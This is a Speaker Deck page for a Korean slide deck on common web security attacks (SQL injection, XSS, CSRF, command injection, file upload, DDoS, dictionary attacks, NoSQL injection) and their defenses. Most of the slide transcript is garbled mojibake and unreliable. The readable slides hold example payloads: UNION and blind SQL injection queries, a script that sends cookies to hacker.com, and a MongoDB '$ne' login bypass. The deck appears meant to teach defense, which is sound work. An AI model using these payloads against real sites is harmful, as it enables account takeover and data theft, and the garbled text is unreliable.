Upgrade to Pro — share decks privately, control downloads, hide ads and more …

웹 개발을 위해 꼭 알아야하는 보안 공격

Lee Sun-Hyoup
February 22, 2021
Programming
0
35

웹 개발을 위해 꼭 알아야하는 보안 공격

통신보안

Lee Sun-Hyoup

February 22, 2021
Tweet

More Decks by Lee Sun-Hyoup

See All by Lee Sun-Hyoup
Kotlin Script 활용하기
kciter
0
540
MongoDB 이해하기
kciter
0
650

Other Decks in Programming

See All in Programming
PRレビューのお供にDanger
stoticdev
1
220
AIプログラミング雑キャッチアップ
yuheinakasaka
11
2k
sappoRo.R #12 初心者セッション
kosugitti
0
270
第3回関東Kaggler会_AtCoderはKaggleの役に立つ
chettub
3
1.1k
Flutter × Firebase Genkit で加速する生成 AI アプリ開発
coborinai
0
170
Grafana Loki によるサーバログのコスト削減
mot_techtalk
1
130
密集、ドキュメントのコロケーション with AWS Lambda
satoshi256kbyte
1
210
DRFを少しずつ オニオンアーキテクチャに寄せていく DjangoCongress JP 2025
nealle
2
210
2025.2.14_Developers Summit 2025_登壇資料
0101unite
0
140
一休.com のログイン体験を支える技術 〜Web Components x Vue.js 活用事例と最適化について〜
atsumim
0
770
Serverless Rust: Your Low-Risk Entry Point to Rust in Production (and the benefits are huge)
lmammino
1
140
GitHub Actions × RAGでコードレビューの検証の結果
sho_000
0
280

Featured

See All Featured
Practical Orchestrator
shlominoach
186
10k
What’s in a name? Adding method to the madness
productmarketing
PRO
22
3.3k
Keith and Marios Guide to Fast Websites
keithpitt
411
22k
Chrome DevTools: State of the Union 2024 - Debugging React & Beyond
addyosmani
4
360
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
49
2.3k
Statistics for Hackers
jakevdp
797
220k
Fontdeck: Realign not Redesign
paulrobertlloyd
83
5.4k
Improving Core Web Vitals using Speculation Rules API
sergeychernyshev
10
500
XXLCSS - How to scale CSS and keep your sanity
sugarenia
248
1.3M
The Power of CSS Pseudo Elements
geoffreycrofte
75
5.5k
Fashionably flexible responsive web design (full day workshop)
malarkey
406
66k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
40
2k

Transcript

  1. ਢѐߊਸਤ೧ ԙঌইঠೞחࠁউҕѺ 2021. 02. 22 ੉ࢶഈ

  2. য়ט੄ݾ಴ ਢࠁউী؀೧੉೧ೞҊӝୡҕѺӝߨҗ೧Ѿߑߨਸ੉೧ೠ׮

  3. ਢࠁউ ਢࢎ੉౟੄ஂড੼ਸҕѺೞחӝࣿ੸ਤഈਵ۽ ਢಕ੉૑ܳాೞৈ ӂೠ੉হחदझమী੽ӔೞѢաؘ੉ఠਬ୹߂౵Ҧ৬э਷೯ਤ݈ܳೠ׮ https://ko.wikipedia.org/wiki/ਢ_೧ఊ

  4. None

  5. ೠࣽр੄पࣻ۽ࢲ࠺झоݎೡࣻب੓׮😨

  6. ցޖ׮নೠҕѺӝߨj 42-*OKFDUJPO 944 $43'"UUBDL 'JMF6QMPBE"UUBDL $PNNBOE*OKFDUJPO #VGGFS0WFSGMPX %JDUJPOBSZ"UUBDL  

    

  7. ੹ࠗחইפ؊ۄبӝୡ੸ੋѪ਷ ԙঌইىঠೠ׮

  8. ঌইঠೞחҕѺӝߨ 4UBSU

  9. 42-*OKFDUJPO ↟ࢲߡীࢲप೯غח42-ਸঈ੄੸ਵ۽੉ਊೞחҕѺ ↟ӝઓ42-ীঈ੄੸ੋ42-ਸࢗੑೠ׮ ↟ؘ੉ఠఎஂ ࢏ઁ١੉оמೞ׮ ↟ڦܻݶࢲ࠺झઙܐп

  10. 42-*OKFDUJPOࢎ۹

  11. 42-*OKFDUJPOࢎ۹

  12. 42-*OKFDUJPOߑয ↟42-ীࢲౠ߹ೠ੄޷ܳо૑חޙ੗ܳ੉झா੉೐ೠ׮ FY =O =U ]    j

    ↟ળ࠺ػࢶ঱ਸࢎਊೠ׮ ↟ਃ્਷ۄ੉࠳۞ܻ ೐ۨ੐ਕ௼ীࢲই઱ੜ݄ইળ׮

  13. 42-*OKFDUJPOबച ↟&SSPSCBTFE42-*OKFDUJPO ↟ੌࠗ۞42-ী۞ܳߊࢤदெਗೞח੿ࠁܳஂٙೠ׮ ↟௪ܻޙ୶ஏ %#ݺ ప੉࠶ݺ١੄ஂٙ੉оמೞ׮

  14. 42-*OKFDUJPOबച ↟#MJOE42-*OKFDUJPO ↟2VFSZѾҗ੄ଵѢ૙ਸࠁҊਗೞח੿ࠁо ઓ੤ೞח૑ঌࣻ੓׮ ୶ۿ  ↟%# 5BCMFݺਸঌࣻ੓׮ ↟42-.BQ ex)

    SELECT * FROM users WHERE user_id = '1' and substring(database(),1,2)='us'#

  15. 42-*OKFDUJPOबച ↟6OJPO42-*OKFDUJPO ↟6OJPOݺ۸ਸ੉ਊೞৈ੿ࠁܳஂٙೠ׮ ex) SELECT * FROM users WHERE user_id

    = '1' or 1=1 UNION SELECT '',id,pw from users#

  16. 944 ↟$SPTF4JUF4DSJQUJOH ↟ਢಕ੉૑ীঈࢿझ௼݀౟ܳࢗੑೞחҕѺ ↟ࢎ੉౟੉ਊ੗੿ࠁܳఎஂೡࣻ੓׮ ↟ڦܻݶ݆਷Ѫਸ੏ח׮

  17. 944ࢎ۹ <script>document.URL='http://hacker.com?'+document.cookie</script> ѱद౸ ੉ਊ੗о Ӗਸ ੍ਸ ٸ ష௾ ఎஂ!!!

  18. 944ߑয ↟)5.-೙ఠ݂ਸೠറ%#ী੷੢ೠ׮ FY   TDSJQU IUNM IFBE NFUB jj

    ↟݅ডਸਤ೧೐ۿ౟ূ٘ীࢲب೙ఠ݂ೠ׮

  19. 944बച ↟খࢲࣗѐೠߑध਷4UPSFE944 ↟3FGMFDUFE944 ↟%0.#BTFE944

  20. 944बച ↟3FGMFDUFE944 ↟Ѩ࢝য١ਸࠁৈ઱חҔীझ௼݀౟ܳबחҕѺ ↟63-ਸࢎਊ੗ীѱ־ܰѱٜ݅ݶҕѺࢿҕ https://papago.naver.com/?sk=ko&tk=en&st=<script>…</script>

  21. 944बച ↟%0.#BTFE944 ↟%0.ীঈ੄੸ੋझ௼݀౟ܳबחҕѺ ↟࠳ۄ਋੷о೧ࢳೞחױ҅ীࢲߊࢤغחҕѺ

  22. $43'"UUBDL ↟$SPTT4JUF3FRVFTU'PSHFSZ ↟ҕѺ੗оࢎਊ੗ܳ੉ਊೞৈਢࢎ੉౟ী ਃ୒ਸࠁղחҕѺ

  23. $43'"UUBDLࢎ۹ о૞ ૓૞ admin 1q2w3e4r ۽Ӓੋ ਃ୒ ࢿҕ/पಁ ࢿҕ೮ਵݶ ੷੢

  24. $43'"UUBDLߑয ↟3FGFSSFS$IFDL ↟ೲਊೠبݫੋ݅ਃ୒ೲۅೞب۾ࢸ੿ ↟$43'5PLFO ↟ݽٚਃ୒ীష௾ਸߊәೞৈࢲߡীࢲѨૐ ↟$"15$)" ↟ࢎۈ੉ਃ୒ೠѪ੉ݏח૑Ѩૐ

  25. $PNNBOE*OKFDUJPO ↟গ೒ܻா੉࣌ীࢲࢎਊغחदझమݺ۸ীঈ੄੸ੋ ݺ۸যܳࢗੑೞחҕѺ 8FC4IFMM"UUBDL  ↟ࢲߡSPPUӂೠਸஂٙೡࣻ੓׮ ↟ڦܻݶࢲ࠺झઙܐп

  26. $PNNBOE*OKFDUJPOࢎ۹ )BDLFS UFYUUYUJGDPOGJH system("cat ${var}") FYFDVUF 8FC4IFMM

  27. $PNNBOE*OKFDUJPOߑয ↟оә੸दझమೣࣻחࢎਊ9 ↟޹хೠޙ੗ܳ೙ఠ݂ FY ]    

  28. 'JMF6QMPBE"UUBDL ↟ঈࢿझ௼݀౟౵ੌਸস۽٘ೞחҕѺ ↟স۽٘റ౵ੌਤ஖ܳ଺ইप೯दఃݶҕѺࢿҕ ↟ڦܻݶࢲ࠺झઙܐп

  29. 'JMF6QMPBE"UUBDLࢎ۹ Upload 1 2 Command WebShell

  30. 'JMF6QMPBE"UUBDLߑয ↟ഛ੢੗౵ੌఋੑѨࢎ ↟স۽٘౵ੌਸդࣻചೞৈ੷੢ ↟ౠࣻޙ੗оನೣػ҃਋স۽٘Ә૑ (Null byte Injection ߑয)

  31. +BWBTDSJQU*OKFDUJPO ↟$MJFOU4JEFীࢲ+BWBTDSJQUܳࢗੑदఃחҕѺ ↟௼܁DPOTPMF١ਸా೧ઑ੘оמೞ׮ ↟$MJFOU4JEFী޹хೠؘ੉ఠܳ֍ਸ҃਋ఎஂоמ

  32. +BWBTDSJQU*OKFDUJPOࢎ۹

  33. +BWBTDSJQU*OKFDUJPOߑয ↟$MJFOU4JEFূ޹хೠ੿ࠁܳ੺؀֍૑ঋח׮ ↟ؘ੉ఠਬബࢿѨࢎо೙ਃೠ҃਋ࢲߡ৬ాनೠ׮ $MJFOUীࢲѨࢎೞݶউػ׮

  34. %%P4 ↟%JTUSJCVUFE%FOJBMPG4FSWJDF ↟ࢲߡী࠺੿࢚੸ਵ۽݆਷౟ې೗ਸࠁղחҕѺ ↟ࢲ࠺झо݃࠺غҊ݆਷࠺ਊ੉ࣗݽػ׮

  35. %%P4ࢎ۹ Zombie PC Traffic

  36. %%P4ߑয ↟ઁੌױࣽೠؘઁੌ݄ӝয۵׮ ↟ഛ੢оמೠࢲ࠺झҳઑࢸ҅ ↟*1೙ఠ݂ ↟ࣛܖ࣌ҳݒj

  37. %JDUJPOBSZ"UUBDL ↟޷ܻࢎ੹ী١۾೧֬਷ޙ੗ৌਸঐഐ۽؀ੑೞחҕѺ ↟#SVUF'PSDF੄ੌઙ

  38. %JDUJPOBSZ"UUBDLࢎ۹ admin apple banana cyber . . . 1q2w3e4r

  39. %JDUJPOBSZ"UUBDLߑয ↟੄޷о੓חޙ੗ৌ਷ঐഐ۽١۾ޅೞب۾ࢸ੿ ↟"DDPVOU-PDLPVU1PMJDZ ↟GBDUPSੋૐ

  40. 3BJOCPX5BCMF ↟೧दೣࣻܳ੉ਊೠಣޙਸݽف੷੢दெ֬਷಴ ↟҅੿ఎஂറঐഐਗޙਸঌইղӝਤ೧ࢎਊ

  41. 3BJOCPX5BCMFߑয ↟4BMUࢎਊ ↟,FZ4USFUDIJOH ↟1#,%' #DSZQU١੄ঐഐചঌҊ્ܻࢎਊ

  42. .POHP%#*OKFDUJPO ↟42-*OKFDUJPO୊ۢঈ੄੸ੋчਸ֍য %#ܳઑ੘ೞחҕѺ ↟ڦܻݶࢲ࠺झઙܐп

  43. .POHP%#*OKFDUJPOࢎ۹ db.collection.find({ "email": "[email protected]", "password": password }) db.collection.find({ "email": "[email protected]",

    "password": { "$ne": "-" }) password = { "$ne": "-" }

  44. .POHP%#*OKFDUJPOߑয ↟৔ೱਸ઴ࣻ੓חޙ੗ܳ೙ఠ݂ೠ׮ FY  \ ^ < >  

    

  45. #VGGFS0WFSGMPX ↟#VGGFS0WFSGMPXܳా೧׮ܲݫݽܻী੽ӔೞחҕѺ ↟׮ܲݫݽܻী੽Ӕ߂ઁযооמೞӝٸޙী஖ݺ੸ ↟दझమ೧ఊӝߨ੉ӝبೞ׮ ↟ڦܻݶࢲ࠺झઙܐп

  46. None